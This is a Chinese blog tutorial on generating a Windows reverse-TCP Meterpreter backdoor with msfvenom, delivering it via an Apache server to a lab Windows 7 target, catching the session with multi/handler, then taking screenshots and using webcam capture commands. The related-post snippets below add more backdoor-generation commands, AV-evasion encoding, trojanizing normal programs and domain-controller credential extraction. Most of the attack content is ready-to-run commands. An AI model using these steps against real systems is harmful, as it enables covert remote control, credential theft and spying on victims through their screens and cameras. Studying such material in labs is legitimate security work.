Msf之内网渗透生成Windows后门,网络安全零基础入门到精通实战教程建议收藏!

原创 于 2025-10-04 13:58:50 发布 · 341 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #web安全 #网络安全 #黑客技术 #渗透测试 #永恒之蓝 #计算机

实验原理: Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。
攻击者: kali-linux 192.168.31.130
靶机: Windows7 192.168.31.134

Windows后门:

在kali-linux上进行操作

生成exe木马文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.130 lport=5555 -f exe -o /var/www/html/payload.exe

(端口号自己随便写,/var/www/html这个是apache服务的路径,因为后面要使用apache服务把木马文件传输到靶机)
注:创建不成功,权限不够的话,可以先使用sudo su命令进入root模式再生成文件。

打开apache服务

service apache2 start

在这里插入图片描述

在Windows7上操作
打开浏览器,在地址栏输入攻击者ip 192.168.31.130
在这里插入图片描述

在kali-linux上进行操作
使用meterpreter

msfconsole

在这里插入图片描述输入各种参数配置

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.130
set lport 5555
run

在这里插入图片描述
返回Windows7
运行下载的木马文件

双击下载的文件,点击运行,无图形界面产生

在这里插入图片描述
在kali-linux上进行操作

返回攻击机,这时已经建立会话

抓取Windows7屏幕

screenshot


屏幕已截取,文件保存在这个位置
在这里插入图片描述

在这里插入图片描述结束会话

exit

meterpreter还有以下命令及参数:
webcam_list 查看摄像头
webcam_snap通过摄像头拍照
webcam _ stream 通过摄像头开启视频
-h :显示帮助。
-i :要使用的网络摄像头的索引号。
-p :JPEG 图像文件路径。默认 HOME /随机乱码名. jpeg 。

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

在这里插入图片描述
在这里插入图片描述

Msf之内渗透生成Windows后门
weixin_63286108的博客
04-30 3817
Msf渗透生成Windows后门
MSF生成后门汇总
干铮的博客
10-10 5034
可执行脚本反弹shell 1.windows下exe执行文件后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名 案例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >/shell.exe 监听设置: msfconsole use exploit/mul...
MSF生成后门(制作各种shellcode攻击)
tmzy1的博客
03-09 1453
msfpayload,msfencode的结合体,可利用msfvenom生成后门(木马)程序,并在目标机上执行,在本地监听上线。进入msf命令:msconsole再执行msfvenom -h可得到命令帮助。
MSF生成windows系统后门程序
gcsdsh的博客
03-26 847
Metasploit框架提供了一个全面的工具集,包括扫描器、利用工具、Payload生成器等,使安全专业人员能够模拟攻击并评估目标系统的安全性。MSF(全名msfconsole)是Metasploit的一个模块,可以执行扫描、利用漏洞、生成Payload以及执行各种其他操作来评估和测试目标系统的安全性。这样就算成功,接下来只需让靶机运行该后门程序,给kali开启apache,可以让靶机直接下载生成的程序。由于这里的靶机是虚拟机,没有摄像头,就不做演示了,还可以执行很多命令,可以用help查看。
利用msfvenom生产windows后门
shy的博客
11-05 2183
原理: 利用msfvenom制作shy .exe 文件,然后发送到靶机上面,运行后就可以在kali linux 上面利用msfconsole连接msfvenom服务控制靶机 1,根据靶机操作系统,搜索适合的生产后门文件的脚本 msfvenom -l | grep windows | grep x64 | grep tcp 2,选择生产脚本,生产后门文件 -p 选择一个payloa...
最全的 Cobalt Strike 使用教程-内渗透之域控攻击篇!黑客技术零基础入门精通教程建议收藏
最新发布
wholeliubei的博客
08-14 1345
本文介绍了攻击域控制器时提取ntds.dit文件的多种方法。ntds.dit存储了域内关键数据,但被系统锁定无法直接读取。文章详细讲解了通过ntdsutil.exe创建快照并拷贝文件、使用vssadmin/vssown.vbs工具管理卷影拷贝、利用IFM方式生成副本,以及diskshadow工具操作卷影服务等方法。这些技术需在获取域控权限后使用,文中强调该内容仅用于学习研究。通过多种技术对比,为安全研究人员提供了完整的域控数据提取方案。
网络安全基于Metasploit Framework的后渗透测试技术:利用MSF进行木马生成与持久化控制
05-09
内容概要:本文详细介绍了Metasploit Framework(MSF)这款由Rapid7公司维护的开源渗透测试框架,旨在提升用户的安全意识,防范因点击不安全应用而导致的信息泄露。文中讲解了MSF中exploit、payload、auxiliary、post...
msf渗透linux教程,Metasploit后门渗透Linux系统以及跨平台后门生成
weixin_31312621的博客
05-03 1747
本帖最后由 小爱_Joker 于 2017-3-9 12:30 编辑标题:Metasploit后门渗透Linux系统以及跨平台后门生成作者:小爱_Joker难度:两级阅读点:使用Metasploit生成多种后门从而快速渗透linux系统上次发的那个Metasploit使用php后门渗透linux主机 不造为啥不能shell 使用终端 有点尴尬。攻击者IP:192.168.0.5受害者IP:192....
网络安全之内渗透实操
anquan2233的博客
07-07 1834
成功获取 shell 后,执行相关命令进行信息搜集,发现目标存在双卡,这意味着目标可能处于多个络环境,增加了内渗透的复杂性与可能性。尝试使用常见的弱口令登录 weblogic 失败后,借助 weblogic 漏洞利用工具进行深入检测,发现目标存在 CVE-2020-2551 漏洞。通过 net user /domain 命令确认当前机器处于域环境内,再使用 net group "domain controllers" /domain 命令定位到域控,通常情况下,DNS 服务器即为域控。
MSF后门生成及免杀思想
qq_68233961的博客
11-14 1520
MSF后门生成及免杀思想
msfvenom生成后门程序及利用
渗透之路,攻防之间皆学问
04-08 7516
msfvenom
MSF给正常程序添加后门
永远是少年
06-10 1787
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF给正常程序添加后门。 一、后门制作 二、监听开启 三、效果检验 (一)软件查杀测评 (二)软件效果检验
msf生成windows后门程序
Deeeelete的博客
02-04 3029
进入文件夹,我们先要把我们需要制作后门程序的正常exe文件拖进去 在此处打开终端,确保该路径存在这个exe文件! 输入命令 msfvenom -a x86 --platform widows -p windows/meterpreter/reverse_tcp LHOST=192.168.132.133 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i ...
msfvenom生成远控后门木马
2303_76389797的博客
04-18 756
这三个指令实在msf夺取了目标机的终端后才可以执行的,screenshot的意思是对目标机进行截图并且保存到本机,run vnc则是可以对目标机进行实时监控,hashdump是获取目标机的密码,不过要说的是,这时候获取的密码为Windows中经过ntml加密的密文,需要进行破译才可获取明文密码。这里设置的是payload以及本机的host和port,注意这里设置的一定要与上面生成木马的时候保持一致。这一句就是开始进行监听,如果有目标机点击了你的木马程序这里的终端会自动切换成目标机的终端。
1. 制作Windows恶意软件
jazzz98的博客
10-09 752
当然也可以直接加到主程序上,但是加主程序上,有时报错。下载的文件在/var/cache/apt/archives下,移动到根目录,dpkg解压。靶机访问链接下载文件http://192.168.142.135/西瓜影音.exe,执行。启动exploit/multi/handler监听模块,设置好端口,run开始监听。创建 deb 软件包,安装后脚本文件,来加载后门。当靶机运行后门程序,反弹成功,恶意软件成功连接。打开靶机,下载后门文件,添加执行权限并执行。msf启动handler监听后门程序,
渗透—红日安全vulnstack(二)
qq_45927819的博客
04-03 7739
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX 环境说明 内段:10.10.10.1/24 DMZ段:192.168.111.1/24 测试机地址:192.168.111.1(Windows),.
kaili生成exe控制被控端
2302_79646534的博客
11-16 604
l, --list <type> 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,......all-p, --payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的-f, --format < format> 指定输出格式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值